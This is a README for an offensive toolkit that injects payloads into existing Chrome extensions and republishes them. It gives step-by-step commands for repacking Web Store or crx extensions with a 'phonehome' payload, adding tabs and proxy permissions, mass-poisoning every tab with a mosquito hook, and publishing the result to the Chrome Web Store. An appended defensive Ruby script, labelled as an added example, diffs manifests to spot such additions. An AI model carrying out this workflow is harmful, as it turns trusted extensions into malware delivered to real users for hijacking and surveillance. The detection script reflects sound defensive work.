Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.

Authors:

  - Krzysztof Kotowicz - @kkotowicz - [blog](http://blog.kotowicz.net)
  - Michele '@antisnatchor' Orru

Injector
--------
Bunch of scripts for injecting existing extensions with new code:

Extensions can be downloaded from Chrome WebStore (repacker-webstore) or taken from crx files (repacker-crx).

Requirements:

  - bash
  - ruby
  - zip (cmd line)
  - curl (cmd line)
  - Google Chrome (used in crx mode only)

Usage:

    # get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js

    # Same, but pack into repacked.zip instead
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js

    # Create new CRX with Google Chrome
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js

    # Inject into existing CRX file
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js

    # Add some permissions into manifest.json
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"

    # Add persistent content script file launching on every tab
    $ echo 'console.log(location.href)' > cs.js
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs," cs.js

For example - mass poisoning every tab with [mosquito](https://github.com/koto/mosquito):

    # start mosquito server:
    $ cd path/to/mosquito
    $ python mosquito/start.py 8082 4444 --http 8000

    # generate mosquito hook:
    # - visit http://localhost:8000/generate
    # - save hook as cs.js

    # inject mosquito dropper into extension:
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs," cs.js

Webstore Uploader
-----------------
Script for uploading and publishing Chrome Extensions packed in zip files in Chrome Web Store

Requirements:

  - ruby

Usage:

Preparation:

  1. Create Chrome developer account
  2. Login at https://chrome.google.com/webstore/developer/dashboard/
  3. Pay your $5 one time fee (credit card needed)
  4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file

Then:

    # Get Chrome extension code
    # e.g. run Injector in zip mode:
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js

    # (optional) - prepare screenshot / description file

    # publish the extension right away
    $ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png

    # or just upload & save it:
    $ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png
    # you can access the extension from your developer dashboard
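
To review a repacked extension from the defensive side, compare its `manifest.json` with the original's and list what was added. The following is an added example, not part of this project; it assumes the injected payload is listed as a background script (this README does not say which manifest keys the injector edits), and both sample manifests are constructed.

```ruby
require 'json'
require 'set'

# Match patterns that make a content script run on every page.
BROAD = Set['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'].freeze

# Collect the security-relevant parts of a manifest.json string.
def manifest_surface(json)
  m = JSON.parse(json)
  bg = m['background'] || {}
  {
    permissions: Set.new(Array(m['permissions']) + Array(m['host_permissions'])),
    background:  Set.new(Array(bg['scripts']) + Array(bg['service_worker']) + Array(bg['page'])),
    # One entry per (script file, match pattern) pair.
    content:     Set.new(Array(m['content_scripts']).flat_map { |cs|
                   Array(cs['js']).product(Array(cs['matches'])) })
  }
end

# Return findings for everything present in the candidate but not in the baseline.
def manifest_diff(baseline_json, candidate_json)
  base = manifest_surface(baseline_json)
  cand = manifest_surface(candidate_json)
  findings = []
  (cand[:permissions] - base[:permissions]).sort.each { |p| findings << "added permission: #{p}" }
  (cand[:background] - base[:background]).sort.each { |s| findings << "added background script: #{s}" }
  (cand[:content] - base[:content]).sort.each do |js, match|
    scope = BROAD.include?(match) ? ' (runs on every page)' : ''
    findings << "added content script: #{js} on #{match}#{scope}"
  end
  findings
end

# Constructed sample manifests (not taken from any real extension).
# Assumption: the payload file appears under background.scripts.
BASELINE = '{"name":"Sample","version":"1.0","permissions":["storage"],
  "background":{"scripts":["bg.js"]}}'
REPACKED = '{"name":"Sample","version":"1.0","permissions":["storage","tabs","proxy"],
  "background":{"scripts":["bg.js","phonehome.js"]},
  "content_scripts":[{"matches":["<all_urls>"],"js":["cs.js"]}]}'

puts manifest_diff(BASELINE, REPACKED) if __FILE__ == $PROGRAM_NAME
```

Run it against the manifest of a known-good copy and the manifest of the copy under review; an empty result means none of the three areas gained entries.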